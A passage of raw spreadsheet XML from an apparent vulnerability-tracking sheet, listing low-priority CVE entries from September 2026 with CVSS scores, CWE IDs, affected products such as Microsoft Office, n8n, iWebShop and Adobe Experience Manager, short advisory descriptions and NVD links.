r="G1326" s="5" t="inlineStr" /><c r="H1326" s="5" t="n"><v>0.004</v></c><c r="I1326" s="5" t="inlineStr" /><c r="J1326" s="5" t="inlineStr" /><c r="K1326" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1326" s="5" t="inlineStr" /><c r="M1326" s="5" t="inlineStr" /><c r="N1326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1326" s="5" t="inlineStr" /><c r="R1326" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1326" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83949</t></is></c></row><row r="1327"><c r="A1327" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1327" s="5" t="inlineStr"><is><t>CVE-2026-83951</t></is></c><c r="D1327" s="5" t="n"><v>5.5</v></c><c r="E1327" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1327" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1327" s="5" t="inlineStr" /><c r="H1327" s="5" t="n"><v>0.004</v></c><c r="I1327" s="5" t="inlineStr" /><c r="J1327" s="5" t="inlineStr" /><c r="K1327" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1327" s="5" t="inlineStr" /><c r="M1327" s="5" t="inlineStr" /><c r="N1327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1327" s="5" t="inlineStr" /><c r="R1327" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1327" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83951</t></is></c></row><row r="1328"><c r="A1328" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1328" s="5" t="inlineStr"><is><t>CVE-2026-83991</t></is></c><c r="D1328" s="5" t="n"><v>5.5</v></c><c r="E1328" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1328" s="5" t="inlineStr" /><c r="H1328" s="5" t="n"><v>0.003</v></c><c r="I1328" s="5" t="inlineStr" /><c r="J1328" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1328"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328" s="5" t="inlineStr" /><c r="M1328" s="5" t="inlineStr" /><c r="N1328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1328" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1328" s="5" t="inlineStr" /><c r="R1328" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1328" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t></is></c></row><row r="1329"><c r="A1329" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1329" s="5" t="inlineStr"><is><t>CVE-2026-85875</t></is></c><c r="D1329" s="5" t="n"><v>5.5</v></c><c r="E1329" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1329" s="5" t="inlineStr" /><c r="H1329" s="5" t="n"><v>0.004</v></c><c r="I1329" s="5" t="inlineStr" /><c r="J1329" s="5" t="inlineStr" /><c r="K1329" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1329" s="5" t="inlineStr" /><c r="M1329" s="5" t="inlineStr" /><c r="N1329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1329" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1329" s="5" t="inlineStr" /><c r="R1329" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1329" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85875</t></is></c></row><row r="1330"><c r="A1330" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1330" s="5" t="inlineStr"><is><t>CVE-2026-86084</t></is></c><c r="D1330" s="5" t="n"><v>5.5</v></c><c r="E1330" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1330" s="5" t="inlineStr" /><c r="H1330" s="5" t="n"><v>0.003</v></c><c r="I1330" s="5" t="inlineStr" /><c r="J1330" s="5" t="inlineStr" /><c r="K1330" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1330" s="5" t="inlineStr" /><c r="M1330" s="5" t="inlineStr" /><c r="N1330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1330" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1330" s="5" t="inlineStr" /><c r="R1330" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S1330" s="5" t="inlineStr"><is><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is></c><c r="T1330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86084</t></is></c></row><row r="1331"><c r="A1331" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1331" s="5" t="inlineStr"><is><t>CVE-2026-86511</t></is></c><c r="D1331" s="5" t="n"><v>5.5</v></c><c r="E1331" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1331" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1331" s="5" t="inlineStr" /><c r="H1331" s="5" t="n"><v>0.004</v></c><c r="I1331" s="5" t="inlineStr" /><c r="J1331" s="5" t="inlineStr" /><c r="K1331" s="5" t="inlineStr" /><c r="L1331" s="5" t="inlineStr" /><c r="M1331" s="5" t="inlineStr" /><c r="N1331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1331" s="5" t="inlineStr" /><c r="R1331" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1331" s="5" t="inlineStr"><is><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is></c><c r="T1331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86511</t></is></c></row><row r="1332"><c r="A1332" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1332" s="5" t="inlineStr"><is><t>CVE-2026-86513</t></is></c><c r="D1332" s="5" t="n"><v>5.5</v></c><c r="E1332" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1332" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1332" s="5" t="inlineStr" /><c r="H1332" s="5" t="n"><v>0.004</v></c><c r="I1332" s="5" t="inlineStr" /><c r="J1332" s="5" t="inlineStr" /><c r="K1332" s="5" t="inlineStr" /><c r="L1332" s="5" t="inlineStr" /><c r="M1332" s="5" t="inlineStr" /><c r="N1332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1332" s="5" t="inlineStr" /><c r="R1332" s="5" t="inlineStr"><is><t>CWE-400, CWE-770</t></is></c><c r="S1332" s="5" t="inlineStr"><is><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is></c><c r="T1332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86513</t></is></c></row><row r="1333"><c r="A1333" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1333" s="5" t="inlineStr"><is><t>CVE-2026-86519</t></is></c><c r="D1333" s="5" t="n"><v>5.5</v></c><c r="E1333" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1333" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1333" s="5" t="inlineStr" /><c r="H1333" s="5" t="n"><v>0.003</v></c><c r="I1333" s="5" t="inlineStr" /><c r="J1333" s="5" t="inlineStr" /><c r="K1333" s="5" t="inlineStr" /><c r="L1333" s="5" t="inlineStr" /><c r="M1333" s="5" t="inlineStr" /><c r="N1333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1333" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1333" s="5" t="inlineStr" /><c r="R1333" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1333" s="5" t="inlineStr"><is><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is></c><c r="T1333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86519</t></is></c></row><row r="1334"><c r="A1334" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1334" s="5" t="inlineStr"><is><t>CVE-2026-86665</t></is></c><c r="D1334" s="5" t="n"><v>5.5</v></c><c r="E1334" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1334" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1334" s="5" t="inlineStr" /><c r="H1334" s="5" t="n"><v>0.004</v></c><c r="I1334" s="5" t="inlineStr" /><c r="J1334" s="5" t="inlineStr" /><c r="K1334" s="5" t="inlineStr" /><c r="L1334" s="5" t="inlineStr" /><c r="M1334" s="5" t="inlineStr" /><c r="N1334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1334" s="5" t="inlineStr" /><c r="R1334" s="5" t="inlineStr"><is><t>CWE-862, CWE-863</t></is></c><c r="S1334" s="5" t="inlineStr"><is><t>A vulnerability was identified in aircheng-org iWebShop-5 up to 5.15. This issue affects the function Update::index of the file controllers/update.php. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86665</t></is></c></row><row r="1335"><c r="A1335" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1335" s="5" t="inlineStr"><is><t>CVE-2026-86666</t></is></c><c r="D1335" s="5" t="n"><v>5.5</v></c><c r="E1335" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1335" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1335" s="5" t="inlineStr" /><c r="H1335" s="5" t="n"><v>0.005</v></c><c r="I1335" s="5" t="inlineStr" /><c r="J1335" s="5" t="inlineStr" /><c r="K1335" s="5" t="inlineStr" /><c r="L1335" s="5" t="inlineStr" /><c r="M1335" s="5" t="inlineStr" /><c r="N1335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1335" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1335" s="5" t="inlineStr" /><c r="R1335" s="5" t="inlineStr"><is><t>CWE-284, CWE-434</t></is></c><c r="S1335" s="5" t="inlineStr"><is><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is></c><c r="T1335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86666</t></is></c></row><row r="1336"><c r="A1336" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1336" s="5" t="inlineStr"><is><t>CVE-2026-86669</t></is></c><c r="D1336" s="5" t="n"><v>5.5</v></c><c r="E1336" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1336" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1336" s="5" t="inlineStr" /><c r="H1336" s="5" t="n"><v>0.004</v></c><c r="I1336" s="5" t="inlineStr" /><c r="J1336" s="5" t="inlineStr" /><c r="K1336" s="5" t="inlineStr" /><c r="L1336" s="5" t="inlineStr" /><c r="M1336" s="5" t="inlineStr" /><c r="N1336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1336" s="5" t="inlineStr" /><c r="R1336" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1336" s="5" t="inlineStr"><is><t>A vulnerability was detected in aircheng-org iWebShop-5 up to 5.15. This affects the function Login of the file controllers/systemseller.php. Performing a manipulation of the argument Name results in improper authentication. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86669</t></is></c></row><row r="1337"><c r="A1337" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1337" s="5" t="inlineStr"><is><t>CVE-2026-86672</t></is></c><c r="D1337" s="5" t="n"><v>5.5</v></c><c r="E1337" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1337" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1337" s="5" t="inlineStr" /><c r="H1337" s="5" t="n"><v>0.003</v></c><c r="I1337" s="5" t="inlineStr" /><c r="J1337" s="5" t="inlineStr" /><c r="K1337" s="5" t="inlineStr" /><c r="L1337" s="5" t="inlineStr" /><c r="M1337" s="5" t="inlineStr" /><c r="N1337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1337" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1337" s="5" t="inlineStr" /><c r="R1337" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1337" s="5" t="inlineStr"><is><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is></c><c r="T1337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t></is></c></row><row r="1338"><c r="A1338" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1338" s="5" t="inlineStr"><is><t>CVE-2026-86673</t></is></c><c r="D1338" s="5" t="n"><v>5.5</v></c><c r="E1338" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1338" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1338" s="5" t="inlineStr" /><c r="H1338" s="5" t="n"><v>0.003</v></c><c r="I1338" s="5" t="inlineStr" /><c r="J1338" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1338" s="5" t="inlineStr" /><c r="L1338" s="5" t="inlineStr" /><c r="M1338" s="5" t="inlineStr" /><c r="N1338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1338" s="5" t="inlineStr" /><c r="R1338" s="5" t="inlineStr"><is><t>CWE-259, CWE-798</t></is></c><c r="S1338" s="5" t="inlineStr"><is><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is></c><c r="T1338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t></is></c></row><row r="1339"><c r="A1339" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1339" s="5" t="inlineStr"><is><t>CVE-2026-86716</t></is></c><c r="D1339" s="5" t="n"><v>5.5</v></c><c r="E1339" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1339" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1339" s="5" t="inlineStr" /><c r="H1339" s="5" t="n"><v>0.003</v></c><c r="I1339" s="5" t="inlineStr" /><c r="J1339" s="5" t="inlineStr" /><c r="K1339" s="5" t="inlineStr" /><c r="L1339" s="5" t="inlineStr" /><c r="M1339" s="5" t="inlineStr" /><c r="N1339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1339" s="5" t="inlineStr" /><c r="R1339" s="5" t="inlineStr"><is><t>CWE-119, CWE-122</t></is></c><c r="S1339" s="5" t="inlineStr"><is><t>A vulnerability was determined in Cesanta mJS up to 1.26. Affected is the function skip_spaces_and_comments of the file src/mjs_tok.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86716</t></is></c></row><row r="1340"><c r="A1340" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1340" s="5" t="inlineStr"><is><t>CVE-2026-86808</t></is></c><c r="D1340" s="5" t="n"><v>5.5</v></c><c r="E1340" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1340" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1340" s="5" t="inlineStr" /><c r="H1340" s="5" t="n"><v>0.006</v></c><c r="I1340" s="5" t="inlineStr" /><c r="J1340" s="5" t="inlineStr" /><c r="K1340" s="5" t="inlineStr" /><c r="L1340" s="5" t="inlineStr" /><c r="M1340" s="5" t="inlineStr" /><c r="N1340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1340" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1340" s="5" t="inlineStr" /><c r="R1340" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="S1340" s="5" t="inlineStr"><is><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is></c><c r="T1340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86808</t></is></c></row><row r="1341"><c r="A1341" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1341" s="5" t="inlineStr"><is><t>CVE-2025-64542</t></is></c><c r="D1341" s="5" t="n"><v>5.4</v></c><c r="E1341" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1341" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1341" s="5" t="inlineStr" /><c r="H1341" s="5" t="n"><v>0.003</v></c><c r="I1341" s="5" t="inlineStr" /><c r="J1341" s="5" t="inlineStr" /><c r="K1341" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1341" s="5" t="inlineStr" /><c r="M1341" s="5" t="inlineStr" /><c r="N1341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1341" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1341" s="5" t="inlineStr" /><c r="R1341" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t></is></c></row><row r="1342"><c r="A1342" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1342" s="5" t="inlineStr"><is><t>CVE-2025-64584</t></is></c><c r="D1342" s="5" t="n"><v>5.4</v></c><c r="E1342" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1342" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1342" s="5" t="inlineStr" /><c r="H1342" s="5" t="n"><v>0.003</v></c><c r="I1342" s="5" t="inlineStr" /><c r="J1342" s="5" t="inlineStr" /><c r="K1342" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1342" s="5" t="inlineStr" /><c r="M1342" s="5" t="inlineStr" /><c r="N1342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1342" s="5" t="inlineStr" /><c r="R1342" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t></is></c></row><row r="1343"><c r="A1343" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1343" s="5" t="inlineStr"><is><t>CVE-2025-64588</t></is></c><c r="D1343" s="5" t="n"><v>5.4</v></c><c r="E1343" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1343" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1343" s="5" t="inlineStr" /><c r="H1343" s="5" t="n"><v>0.003</v></c><c r="I1343" s="5" t="inlineStr" /><c r="J1343" s="5" t="inlineStr" /><c r="K1343" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1343" s="5" t="inlineStr" /><c r="M1343" s="5" t="inlineStr" /><c r="N1343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1343" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1343" s="5" t="inlineStr" /><c r="R1343" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t></is></c></row><row r="1344"><c r="A1344" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1344" s="5" t="inlineStr"><is><t>CVE-2025-64589</t></is></c><c r="D1344" s="5" t="n"><v>5.4</v></c><c r="E1344" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1344" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1344" s="5" t="inlineStr" /><c r="H1344" s="5" t="n"><v>0.003</v></c><c r="I1344" s="5" t="inlineStr" /><c r="J1344" s="5" t="inlineStr" /><c r="K1344" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1344" s="5" t="inlineStr" /><c r="M1344" s="5" t="inlineStr" /><c r="N1344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1344" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1344" s="5" t="inlineStr" /><c r="R1344" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t></is></c></row><row r="1345"><c r="A1345" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1345" s="5" t="inlineStr"><is><t>CVE-2025-64610</t></is></c><c r="D1345" s="5" t="n"><v>5.4</v></c><c r="E1345" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1345" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1345" s="5" t="inlineStr" /><c r="H1345" s="5" t="n"><v>0.003</v></c><c r="I1345" s="5" t="inlineStr" /><c r="J1345" s="5" t="inlineStr" /><c r="K1345" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1345" s="5" t="inlineStr" /><c r="M1345" s="5" t="inlineStr" /><c r="N1345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1345" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1345" s="5" t="inlineStr" /><c r="R1345" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t></is></c></row><row r="1346"><c r="A1346" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1346" s="5" t="inlineStr"><is><t>CVE-2025-64618</t></is></c><c r="D1346" s="5" t="n"><v>5.4</v></c><c r="E1346" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1346" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1346" s="5" t="inlineStr" /><c r="H1346" s="5" t="n"><v>0.003</v></c><c r="I1346" s="5" t="inlineStr" /><c r="J1346" s="5" t="inlineStr" /><c r="K1346" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1346" s="5" t="inlineStr" /><c r="M1346" s="5" t="inlineStr" /><c r="N1346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1346" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1346" s="5" t="inlineStr" /><c r="R1346" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t></is></c></row><row r="1347"><c r="A1347" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1347" s="5" t="inlineStr"><is><t>CVE-2025-64830</t></is></c><c r="D1347" s="5" t="n"><v>5.4</v></c><c r="E1347" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1347" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1347" s="5" t="inlineStr" /><c r="H1347" s="5" t="n"><v>0.003</v></c><c r="I1347" s="5" t="inlineStr" /><c r="J1347" s="5" t="inlineStr" /><c r="K1347" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1347" s="5" t="inlineStr" /><c r="M1347" s="5" t="inlineStr" /><c r="N1347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1347" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1347" s="5" t="inlineStr" /><c r="R1347" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64830</t></is></c></row><row r="1348"><c r="A1348" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1348" s="5" t="inlineStr"><is><t>CVE-2025-64838</t></is></c><c r="D1348" s="5" t="n"><v>5.4</v></c><c r="E1348" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1348" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1348" s="5" t="inlineStr" /><c r="H1348" s="5" t="n"><v>0.003</v></c><c r="I1348" s="5" t="inlineStr" /><c r="J1348" s="5" t="inlineStr" /><c r="K1348" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1348" s="5" t="inlineStr" /><c r="M1348" s="5" t="inlineStr" /><c r="N1348" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1348" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1348" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1348" s="5" t="inlineStr" /><c r="R1348" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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8" s="6" 